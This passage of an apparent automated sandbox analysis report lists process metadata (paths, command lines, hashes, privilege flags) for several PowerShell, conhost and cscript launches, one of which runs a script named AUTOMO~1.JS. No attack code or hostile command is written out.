                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:05:17:11
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell powershell
                                                    Imagebase:0x7ff625570000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:17
                                                    Start time:05:17:11
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                    Imagebase:0x7ff625570000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:18
                                                    Start time:05:17:13
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"
                                                    Imagebase:0x7ff6b8e40000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:19
                                                    Start time:05:17:13
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\cscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cscript AUTOMO~1.JS
                                                    Imagebase:0x7ff6ad960000
                                                    File size:161'280 bytes
                                                    MD5 hash:B8454647EFC71192BF7B1572D18F7BD8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:05:17:26
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell powershell
                                                    Imagebase:0x7ff625570000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:21
                                                    Start time:05:17:26
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                    Imagebase:0x7ff625570000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    No disassembly